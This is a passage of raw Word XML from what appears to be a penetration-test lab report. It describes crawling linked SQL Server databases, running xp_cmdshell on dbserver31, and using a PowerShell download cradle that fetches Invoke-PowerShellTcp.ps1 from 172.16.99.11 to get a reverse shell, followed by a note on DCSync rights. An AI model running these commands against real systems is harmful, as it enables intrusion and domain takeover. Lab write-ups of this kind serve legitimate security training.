            <wp:extent cx="5943009" cy="2621061"/>
            <wp:effectExtent l="0" t="0" r="63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2"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="262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99BA3" w14:textId="6DA9527F" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="151"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDE8294" w14:textId="56E243C0" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="290" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="142"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC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can</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC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use</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SQLServerLinkCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-33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for crawling the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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database</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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links</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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automatically.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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 xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled, it is possible to execute commands linked databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E1383" w14:textId="10D85405" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="290" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="142"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A5F889" w14:textId="634A0224" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3629"/>
          <w:tab w:val="left" w:pos="5444"/>
          <w:tab w:val="left" w:pos="7390"/>
          <w:tab w:val="left" w:pos="8794"/>
        </w:tabs>
        <w:spacing w:before="44" w:line="288" w:lineRule="auto"/>
        <w:ind w:right="143"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLServerLinkCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbserver31</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"exec </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2C584F" w14:textId="454C949B" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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got</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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command</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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now</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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we</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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will</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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try</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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to</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC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download execute cradle to execute a PowerShell reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EDCF28" w14:textId="55CD93C0" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>SQLServerLinkCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>dbserver31</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">'exec </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(New-Object Net.WebClient).DownloadString(''http://172.16.99.11:8000/Invoke-PowerS hellTcp.ps1'')"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA0C96" w14:textId="75E2136E" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman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AF1ECBE" wp14:editId="02EC5D5D">
            <wp:extent cx="5943009" cy="2621061"/>
            <wp:effectExtent l="0" t="0" r="63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2"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="262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065A2" w14:textId="741E4EFC" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b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5EEAA96" wp14:editId="11A1948B">
            <wp:extent cx="5943009" cy="2652592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2"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="265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192D2" w14:textId="01313059" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100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C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="63"/>
          <w:w w:val="150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our</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="64"/>
          <w:w w:val="150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listener,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="63"/>
          <w:w w:val="150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we</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="64"/>
          <w:w w:val="150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can</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="64"/>
          <w:w w:val="150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see</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="63"/>
          <w:w w:val="150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that</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="64"/>
          <w:w w:val="150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we</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="64"/>
          <w:w w:val="150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have</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="63"/>
          <w:w w:val="150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successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="64"/>
          <w:w w:val="150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got</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="50"/>
          <w:w w:val="150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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC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reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="50"/>
          <w:w w:val="150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shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC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pacing w:val="-5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sqlserversync</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53AE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53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dbserver31.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57186713" w14:textId="49CA27D4" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1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9FCE2B" wp14:editId="55CFE574">
            <wp:extent cx="5943600" cy="2894618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CE7F" w14:textId="23A27AEB" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1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F5329B" wp14:editId="6F750338">
            <wp:extent cx="5943600" cy="545441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52CD" w14:textId="0AA9C9FA" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB6397D" w14:textId="4D145EC9" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC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26" w:name="_Toc146476888"/>
      <w:bookmarkStart w:id="27" w:name="_Toc146477325"/>
      <w:r w:rsidRPr="00C53AEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Tech-DC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0E1F7274" w14:textId="6776909F" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC"/>
    <w:p w14:paraId="4A9724B7" w14:textId="0E9FAB1A" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00E408CB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46477326"/>
      <w:r w:rsidRPr="00E40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CSync:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1E73AAF6" w14:textId="77777777" w:rsidR="00E408CB" w:rsidRPr="00E408CB" w:rsidRDefault="00E408CB" w:rsidP="00E408CB"/>
    <w:p w14:paraId="0BCA0304" w14:textId="30F7EF9D" w:rsidR="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr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n the bloodhound</w:t>
      </w:r>
      <w:r w:rsidR="005B1265" w:rsidRPr="005B1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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I marked </w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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the</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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5B1265"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machine</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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bserver31 and </w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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the</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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5B1265"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user</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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sqlserversync as owned. And </w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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I</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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found out that SQLSERVERSYNC has </w:t>
      </w:r>
      <w:r w:rsidR="005B1265" w:rsidRPr="005B1265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DCSync</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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5B1265"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permission</w:t>
      </w:r>
      <w:r w:rsidR="005B1265" w:rsidRPr="005B1265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s</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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on </w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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the</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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="005B1265" w:rsidRPr="005B1265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tech.finance</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005B1265" w:rsidRPr="005B1265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.corp</w:t>
      </w:r>
      <w:r w:rsidR="005B1265"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omain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B02976" w14:textId="00FFA8A3" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53A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9B8D85C" wp14:editId="4D4A2293">
